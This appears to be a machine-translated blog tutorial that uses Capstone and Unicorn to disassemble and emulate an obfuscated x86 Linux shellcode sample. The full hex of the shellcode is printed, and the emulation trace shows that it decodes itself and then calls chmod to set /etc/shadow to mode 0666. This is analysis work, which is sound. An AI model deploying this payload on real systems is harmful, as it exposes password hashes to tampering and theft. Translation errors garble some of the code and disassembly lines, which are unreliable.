Practice using Unicorn, Capstone

Others 2020-02-11 23:19:39 views: null

Unicorn is a lightweight multi-platform, CPU emulator multi-frame architecture. Official website:http://www.unicorn-engine.org/

Capstone is a lightweight multi-platform, multi-frame disassembler architecture. Official website :http://www.capstone-engine.org/

Reference: https://bbs.pediy.com/thread-224330.htm

Exercise: Analysis of confusion shllcode

shellcode=b"\xe8\xff\xff\xff\xff\xc0\x5d\x6a\x05\x5b\x29\xdd\x83\xc5\x4e\x89\xe9\x6a\x02\x03\x0c\x24\x5b\x31\xd2\x66\xba\x12\x00\x8b\x39\xc1\xe7\x10\xc1\xef\x10\x81\xe9\xfe\xff\xff\xff\x8b\x45\x00\xc1\xe0\x10\xc1\xe8\x10\x89\xc3\x09\xfb\x21\xf8\xf7\xd0\x21\xd8\x66\x89\x45\x00\x83\xc5\x02\x4a\x85\xd2\x0f\x85\xcf\xff\xff\xff\xec\x37\x75\x5d\x7a\x05\x28\xed\x24\xed\x24\xed\x0b\x88\x7f\xeb\x50\x98\x38\xf9\x5c\x96\x2b\x96\x70\xfe\xc6\xff\xc6\xff\x9f\x32\x1f\x58\x1e\x00\xd3\x80"

Use capstone Disassembly:

from Capstone Import * 
MD = Cs (CS_ARCH_X86, CS_MODE_32) // initialization, processor architecture specified
shellcode = b"\xe8\xff\xff\xff\xff\xc0\x5d\x6a\x05\x5b\x29\xdd\x83\xc5\x4e\x89\xe9\x6a\x02\x03\x0c\x24\x5b\x31\xd2\x66\xba\x12\x00\x8b\x39\xc1\xe7\x10\xc1\xef\x10\x81\xe9\xfe\xff\xff\xff\x8b\x45\x00\xc1\xe0\x10\xc1\xe8\x10\x89\xc3\x09\xfb\x21\xf8\xf7\xd0\x21\xd8\x66\x89\x45\x00\x83\xc5\x02\x4a\x85\xd2\x0f\x85\xcf\xff\xff\xff\xec\x37\x75\x5d\x7a\x05\x28\xed\x24\xed\x24\xed\x0b\x88\x7f\xeb\x50\x98\x38\xf9\x5c\x96\x2b\x96\x70\xfe\xc6\xff\xc6\xff\x9f\x32\x1f\x58\x1e\x00\xd3\x80"
for code in md.disasm(shellcode,0x0):
    print("0x%x:\t%s\t%s"%(code.address,code.mnemonic,code.op_str))

Disassembly results:

0x0:    call    4
0x5:    rcr    byte ptr [ebp + 0x6a], 5
0x9:    pop    ebx
0xa:    sub    ebp, ebx
0xc:    add    ebp, 0x4e
0xf:    mov    ecx, ebp
0x11:    push    2
0x13:    add    ecx, dword ptr [esp]
0x16:    pop    ebx
0x17:    xor    edx, edx
0x19:    mov    dx, 0x12
0x1d:    mov    edi, dword ptr [ecx]
0x1f:    shl    edi, 0x10
0x22:    shr    edi, 0x10
0x25:    sub    ecx, 0xfffffffe
0x2b:    mov    eax, dword ptr [ebp]
0x2e:    shl    eax, 0x10
0x31:    shr    eax, 0x10
0x34:    mov    ebx, eax
0x36:    or    ebx, edi
0x38:    and    eax, edi
0x3a:    not    eax
0x3c:    and    eax, ebx
0x3e:    mov    word ptr [ebp], ax
0x42:    add    ebp, 2
0x45:    dec    edx
0x46:    test    edx, edx
0 x48:     etc     0x1D
0x4e:    in    al, dx
0x4f:    aaa    
0x50:    jne    0xaf
0x52:    jp    0x59
0x54:    sub    ch, ch
0x56:    and    al, 0xed
0x58:    and    al, 0xed
0x5a:    or    ecx, dword ptr [eax - 0x67af1481]
0x60:    cmp    cl, bh
0x62:    pop    esp
0 yax63:     xchg     eax, this
0x64:    sub    edx, dword ptr [esi - 0x390190]

The following simulation performed using unicorn

from Unicorn Import *
 from unicorn.x86_const Import *
 from Capstone Import * 
MD = Cs (CS_ARCH_X86, CS_MODE_32) # initialization disassemble
BASE = 0x400000
STACK_ADDR = 0x0
STACK_SIZE = 1024 * 1024

MU = Uc of (UC_ARCH_X86, UC_MODE_32) initialization #

mu.mem_map (BASE, 1024 * 1024 ) # open mapping space simulation run
mu.mem_map (STACK_ADDR, STACK_SIZE) # stack space
shellcode = b"\xe8\xff\xff\xff\xff\xc0\x5d\x6a\x05\x5b\x29\xdd\x83\xc5\x4e\x89\xe9\x6a\x02\x03\x0c\x24\x5b\x31\xd2\x66\xba\x12\x00\x8b\x39\xc1\xe7\x10\xc1\xef\x10\x81\xe9\xfe\xff\xff\xff\x8b\x45\x00\xc1\xe0\x10\xc1\xe8\x10\x89\xc3\x09\xfb\x21\xf8\xf7\xd0\x21\xd8\x66\x89\x45\x00\x83\xc5\x02\x4a\x85\xd2\x0f\x85\xcf\xff\xff\xff\xec\x37\x75\x5d\x7a\x05\x28\xed\x24\xed\x24\xed\x0b\x88\x7f\xeb\x50\x98\x38\xf9\x5c\x96\x2b\x96\x70\xfe\xc6\xff\xc6\xff\x9f\x32\x1f\x58\x1e\x00\xd3\x80"
mu.mem_write (BASE, shellcode) // load the instruction code for an analog
mu.reg_write (UC_X86_REG_ESP, STACK_ADDR + STACK_SIZE are // 2 ) Set the stack pointer #


def syscall_num_to_name(num):
    syscalls = {1: "sys_exit", 15: "sys_chmod"}
    return syscalls[num]


def hook_code(mu, address, size, user_data):#hook代码

    # print('>>> Tracing instruction at 0x%x, instruction size = 0x%x' %(address, size))

    machine_code = mu.mem_read(address, size)
    for code in md.disasm(machine_code,address):
        print("     0x%x:\t%s\t%s" % (code.address, code.mnemonic, code.op_str))
    if machine_code == b"\xcd\x80":

        r_eax = mu.reg_read(UC_X86_REG_EAX)
        r_ebx = mu.reg_read(UC_X86_REG_EBX)
        r_ecx = mu.reg_read(UC_X86_REG_ECX)
        r_edx = mu.reg_read(UC_X86_REG_EDX)
        syscall_name = syscall_num_to_name(r_eax)
        print("--------------")
        print("We intercepted system call: " + syscall_name)

        if syscall_name == "sys_chmod":
            s = mu.mem_read(r_ebx, 20).split(b"\x00")[0]
            print("arg0 = 0x%x -> %s" % (r_ebx, s))
            print("arg1 = " + oct(r_ecx))
        elif syscall_name == "sys_exit":
            print("arg0 = " + hex(r_ebx))
            exit()
        mu.reg_write(UC_X86_REG_EIP, address + size)

mu.hook_add (UC_HOOK_CODE, hook_code) // add a hook function, first call the hook function before each instruction execution
mu.emu_start (BASE, BASE - 1) // begin

Results of the:

     0x400000:    call    0x400004
     0x400004:    inc    eax
     0x400006:    pop    ebp
     0x400007:    push    5
     0x400009:    pop    ebx
     0x40000a:    sub    ebp, ebx
     0x40000c:    add    ebp, 0x4e
     0x40000f:    mov    ecx, ebp
     0x400011:    push    2
     0x400013:    add    ecx, dword ptr [esp]
     0x400016:    pop    ebx
     0x400017:    xor    edx, edx
     0x400019:    mov    dx, 0x12
     0x40001d:    mov    edi, dword ptr [ecx]
     0x40001f:    shl    edi, 0x10
     0x400022:    shr    edi, 0x10
     0x400025:    sub    ecx, 0xfffffffe
     0x40002b:    mov    eax, dword ptr [ebp]
     0x40002e:    shl    eax, 0x10
     0x400031:    shr    eax, 0x10
     0x400034:    mov    ebx, eax
     0x400036:    or    ebx, edi
     0x400038:    and    eax, edi
     0x40003a:    not    eax
     0x40003c:    and    eax, ebx
     0x40003e:    mov    word ptr [ebp], ax
     0x400042:    add    ebp, 2
     0x400045:    dec    edx
     0x400046:    test    edx, edx
     0x400048:    jne    0x40001d
     0x40001d:    mov    edi, dword ptr [ecx]
     0x40001f:    shl    edi, 0x10
     0x400022:    shr    edi, 0x10
     0x400025:    sub    ecx, 0xfffffffe
     0x40002b:    mov    eax, dword ptr [ebp]
     0x40002e:    shl    eax, 0x10
     0x400031:    shr    eax, 0x10
     0x400034:    mov    ebx, eax
     0x400036:    or    ebx, edi
     0x400038:    and    eax, edi
     0x40003a:    not    eax
     0x40003c:    and    eax, ebx
     0x40003e:    mov    word ptr [ebp], ax
     0x400042:    add    ebp, 2
     0x400045:    dec    edx
     0x400046:    test    edx, edx
     0x400048:    jne    0x40001d
     0x40001d:    mov    edi, dword ptr [ecx]
     0x40001f:    shl    edi, 0x10
     0x400022:    shr    edi, 0x10
     0x400025:    sub    ecx, 0xfffffffe
     0x40002b:    mov    eax, dword ptr [ebp]
     0x40002e:    shl    eax, 0x10
     0x400031:    shr    eax, 0x10
     0x400034:    mov    ebx, eax
     0x400036:    or    ebx, edi
     0x400038:    and    eax, edi
     0x40003a:    not    eax
     0x40003c:    and    eax, ebx
     0x40003e:    mov    word ptr [ebp], ax
     0x400042:    add    ebp, 2
     0x400045:    dec    edx
     0x400046:    test    edx, edx
     0x400048:    jne    0x40001d
     0x40001d:    mov    edi, dword ptr [ecx]
     0x40001f:    shl    edi, 0x10
     0x400022:    shr    edi, 0x10
     0x400025:    sub    ecx, 0xfffffffe
     0x40002b:    mov    eax, dword ptr [ebp]
     0x40002e:    shl    eax, 0x10
     0x400031:    shr    eax, 0x10
     0x400034:    mov    ebx, eax
     0x400036:    or    ebx, edi
     0x400038:    and    eax, edi
     0x40003a:    not    eax
     0x40003c:    and    eax, ebx
     0x40003e:    mov    word ptr [ebp], ax
     0x400042:    add    ebp, 2
     0x400045:    dec    edx
     0x400046:    test    edx, edx
     0x400048:    jne    0x40001d
     0x40001d:    mov    edi, dword ptr [ecx]
     0x40001f:    shl    edi, 0x10
     0x400022:    shr    edi, 0x10
     0x400025:    sub    ecx, 0xfffffffe
     0x40002b:    mov    eax, dword ptr [ebp]
     0x40002e:    shl    eax, 0x10
     0x400031:    shr    eax, 0x10
     0x400034:    mov    ebx, eax
     0x400036:    or    ebx, edi
     0x400038:    and    eax, edi
     0x40003a:    not    eax
     0x40003c:    and    eax, ebx
     0x40003e:    mov    word ptr [ebp], ax
     0x400042:    add    ebp, 2
     0x400045:    dec    edx
     0x400046:    test    edx, edx
     0x400048:    jne    0x40001d
     0x40001d:    mov    edi, dword ptr [ecx]
     0x40001f:    shl    edi, 0x10
     0x400022:    shr    edi, 0x10
     0x400025:    sub    ecx, 0xfffffffe
     0x40002b:    mov    eax, dword ptr [ebp]
     0x40002e:    shl    eax, 0x10
     0x400031:    shr    eax, 0x10
     0x400034:    mov    ebx, eax
     0x400036:    or    ebx, edi
     0x400038:    and    eax, edi
     0x40003a:    not    eax
     0x40003c:    and    eax, ebx
     0x40003e:    mov    word ptr [ebp], ax
     0x400042:    add    ebp, 2
     0x400045:    dec    edx
     0x400046:    test    edx, edx
     0x400048:    jne    0x40001d
     0x40001d:    mov    edi, dword ptr [ecx]
     0x40001f:    shl    edi, 0x10
     0x400022:    shr    edi, 0x10
     0x400025:    sub    ecx, 0xfffffffe
     0x40002b:    mov    eax, dword ptr [ebp]
     0x40002e:    shl    eax, 0x10
     0x400031:    shr    eax, 0x10
     0x400034:    mov    ebx, eax
     0x400036:    or    ebx, edi
     0x400038:    and    eax, edi
     0x40003a:    not    eax
     0x40003c:    and    eax, ebx
     0x40003e:    mov    word ptr [ebp], ax
     0x400042:    add    ebp, 2
     0x400045:    dec    edx
     0x400046:    test    edx, edx
     0x400048:    jne    0x40001d
     0x40001d:    mov    edi, dword ptr [ecx]
     0x40001f:    shl    edi, 0x10
     0x400022:    shr    edi, 0x10
     0x400025:    sub    ecx, 0xfffffffe
     0x40002b:    mov    eax, dword ptr [ebp]
     0x40002e:    shl    eax, 0x10
     0x400031:    shr    eax, 0x10
     0x400034:    mov    ebx, eax
     0x400036:    or    ebx, edi
     0x400038:    and    eax, edi
     0x40003a:    not    eax
     0x40003c:    and    eax, ebx
     0x40003e:    mov    word ptr [ebp], ax
     0x400042:    add    ebp, 2
     0x400045:    dec    edx
     0x400046:    test    edx, edx
     0x400048:    jne    0x40001d
     0x40001d:    mov    edi, dword ptr [ecx]
     0x40001f:    shl    edi, 0x10
     0x400022:    shr    edi, 0x10
     0x400025:    sub    ecx, 0xfffffffe
     0x40002b:    mov    eax, dword ptr [ebp]
     0x40002e:    shl    eax, 0x10
     0x400031:    shr    eax, 0x10
     0x400034:    mov    ebx, eax
     0x400036:    or    ebx, edi
     0x400038:    and    eax, edi
     0x40003a:    not    eax
     0x40003c:    and    eax, ebx
     0x40003e:    mov    word ptr [ebp], ax
     0x400042:    add    ebp, 2
     0x400045:    dec    edx
     0x400046:    test    edx, edx
     0x400048:    jne    0x40001d
     0x40001d:    mov    edi, dword ptr [ecx]
     0x40001f:    shl    edi, 0x10
     0x400022:    shr    edi, 0x10
     0x400025:    sub    ecx, 0xfffffffe
     0x40002b:    mov    eax, dword ptr [ebp]
     0x40002e:    shl    eax, 0x10
     0x400031:    shr    eax, 0x10
     0x400034:    mov    ebx, eax
     0x400036:    or    ebx, edi
     0x400038:    and    eax, edi
     0x40003a:    not    eax
     0x40003c:    and    eax, ebx
     0x40003e:    mov    word ptr [ebp], ax
     0x400042:    add    ebp, 2
     0x400045:    dec    edx
     0x400046:    test    edx, edx
     0x400048:    jne    0x40001d
     0x40001d:    mov    edi, dword ptr [ecx]
     0x40001f:    shl    edi, 0x10
     0x400022:    shr    edi, 0x10
     0x400025:    sub    ecx, 0xfffffffe
     0x40002b:    mov    eax, dword ptr [ebp]
     0x40002e:    shl    eax, 0x10
     0x400031:    shr    eax, 0x10
     0x400034:    mov    ebx, eax
     0x400036:    or    ebx, edi
     0x400038:    and    eax, edi
     0x40003a:    not    eax
     0x40003c:    and    eax, ebx
     0x40003e:    mov    word ptr [ebp], ax
     0x400042:    add    ebp, 2
     0x400045:    dec    edx
     0x400046:    test    edx, edx
     0x400048:    jne    0x40001d
     0x40001d:    mov    edi, dword ptr [ecx]
     0x40001f:    shl    edi, 0x10
     0x400022:    shr    edi, 0x10
     0x400025:    sub    ecx, 0xfffffffe
     0x40002b:    mov    eax, dword ptr [ebp]
     0x40002e:    shl    eax, 0x10
     0x400031:    shr    eax, 0x10
     0x400034:    mov    ebx, eax
     0x400036:    or    ebx, edi
     0x400038:    and    eax, edi
     0x40003a:    not    eax
     0x40003c:    and    eax, ebx
     0x40003e:    mov    word ptr [ebp], ax
     0x400042:    add    ebp, 2
     0x400045:    dec    edx
     0x400046:    test    edx, edx
     0x400048:    jne    0x40001d
     0x40001d:    mov    edi, dword ptr [ecx]
     0x40001f:    shl    edi, 0x10
     0x400022:    shr    edi, 0x10
     0x400025:    sub    ecx, 0xfffffffe
     0x40002b:    mov    eax, dword ptr [ebp]
     0x40002e:    shl    eax, 0x10
     0x400031:    shr    eax, 0x10
     0x400034:    mov    ebx, eax
     0x400036:    or    ebx, edi
     0x400038:    and    eax, edi
     0x40003a:    not    eax
     0x40003c:    and    eax, ebx
     0x40003e:    mov    word ptr [ebp], ax
     0x400042:    add    ebp, 2
     0x400045:    dec    edx
     0x400046:    test    edx, edx
     0x400048:    jne    0x40001d
     0x40001d:    mov    edi, dword ptr [ecx]
     0x40001f:    shl    edi, 0x10
     0x400022:    shr    edi, 0x10
     0x400025:    sub    ecx, 0xfffffffe
     0x40002b:    mov    eax, dword ptr [ebp]
     0x40002e:    shl    eax, 0x10
     0x400031:    shr    eax, 0x10
     0x400034:    mov    ebx, eax
     0x400036:    or    ebx, edi
     0x400038:    and    eax, edi
     0x40003a:    not    eax
     0x40003c:    and    eax, ebx
     0x40003e:    mov    word ptr [ebp], ax
     0x400042:    add    ebp, 2
     0x400045:    dec    edx
     0x400046:    test    edx, edx
     0x400048:    jne    0x40001d
     0x40001d:    mov    edi, dword ptr [ecx]
     0x40001f:    shl    edi, 0x10
     0x400022:    shr    edi, 0x10
     0x400025:    sub    ecx, 0xfffffffe
     0x40002b:    mov    eax, dword ptr [ebp]
     0x40002e:    shl    eax, 0x10
     0x400031:    shr    eax, 0x10
     0x400034:    mov    ebx, eax
     0x400036:    or    ebx, edi
     0x400038:    and    eax, edi
     0x40003a:    not    eax
     0x40003c:    and    eax, ebx
     0x40003e:    mov    word ptr [ebp], ax
     0x400042:    add    ebp, 2
     0x400045:    dec    edx
     0x400046:    test    edx, edx
     0x400048:    jne    0x40001d
     0x40001d:    mov    edi, dword ptr [ecx]
     0x40001f:    shl    edi, 0x10
     0x400022:    shr    edi, 0x10
     0x400025:    sub    ecx, 0xfffffffe
     0x40002b:    mov    eax, dword ptr [ebp]
     0x40002e:    shl    eax, 0x10
     0x400031:    shr    eax, 0x10
     0x400034:    mov    ebx, eax
     0x400036:    or    ebx, edi
     0x400038:    and    eax, edi
     0x40003a:    not    eax
     0x40003c:    and    eax, ebx
     0x40003e:    mov    word ptr [ebp], ax
     0x400042:    add    ebp, 2
     0x400045:    dec    edx
     0x400046:    test    edx, edx
     0x400048:    jne    0x40001d
     0x40001d:    mov    edi, dword ptr [ecx]
     0x40001f:    shl    edi, 0x10
     0x400022:    shr    edi, 0x10
     0x400025:    sub    ecx, 0xfffffffe
     0x40002b:    mov    eax, dword ptr [ebp]
     0x40002e:    shl    eax, 0x10
     0x400031:    shr    eax, 0x10
     0x400034:    mov    ebx, eax
     0x400036:    or    ebx, edi
     0x400038:    and    eax, edi
     0x40003a:    not    eax
     0x40003c:    and    eax, ebx
     0x40003e:    mov    word ptr [ebp], ax
     0x400042:    add    ebp, 2
     0x400045:    dec    edx
     0x400046:    test    edx, edx
     0x400048:    jne    0x40001d
     0x40001d:    mov    edi, dword ptr [ecx]
     0x40001f:    shl    edi, 0x10
     0x400022:    shr    edi, 0x10
     0x400025:    sub    ecx, 0xfffffffe
     0x40002b:    mov    eax, dword ptr [ebp]
     0x40002e:    shl    eax, 0x10
     0x400031:    shr    eax, 0x10
     0x400034:    mov    ebx, eax
     0x400036:    or    ebx, edi
     0x400038:    and    eax, edi
     0x40003a:    not    eax
     0x40003c:    and    eax, ebx
     0x40003e:    mov    word ptr [ebp], ax
     0x400042:    add    ebp, 2
     0x400045:    dec    edx
     0x400046:    test    edx, edx
     0x400048:    jne    0x40001d
     0x40004e:    cdq    
     0x40004f:    push    0xf
     0x400051:    pop    eax
     0x400052:    push    edx
     0x400053:    call    0x400064
     0x400064:    pop    ebx
     0x400065:    push    0x1b6
     0x40006a:    pop    ecx
     0x40006b:    int    0x80
--------------
We intercepted system call: sys_chmod
arg0 = 0x400058 -> bytearray(b'/etc/shadow')
arg1 = 0o666
     0x40006d:    push    1
     0x40006f:    pop    eax
     0x400070:    int    0x80
--------------
We intercepted system call: sys_exit
arg0 = 0x400058

 

Guess you like

Origin www.cnblogs.com/DirWang/p/12297192.html
Recommended
The “35-year-old curse” of Chinese coders
蘭雅 CorelDRAW 插件 2024.5.1 国际劳动节版,免费下载
Ranking
Methods and Practices of Manufacturing Data Quality Improvement
Serial port upgrade program for efficient transmission of large firmware
Use KITTI to run LIOSAM and complete the EVO evaluation
Calling methods on string literals (Java)
ActiveMQ and Spring integration (4)
You have to know the HTTPS! ! !
PAT whether Structures and Algorithms 7-4 with a binary search tree (40 rows streamlined structure)
el-upload brings request background
UVA - 1204 Fun Game-like pressure dp
2019-12-28
Daily
More
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)
2024-04-30(36)
2024-04-29(5)
2024-04-28(12)
2024-04-27(29)
2024-04-26(22)
2024-04-25(32)

Code World

© 2018 codetd.com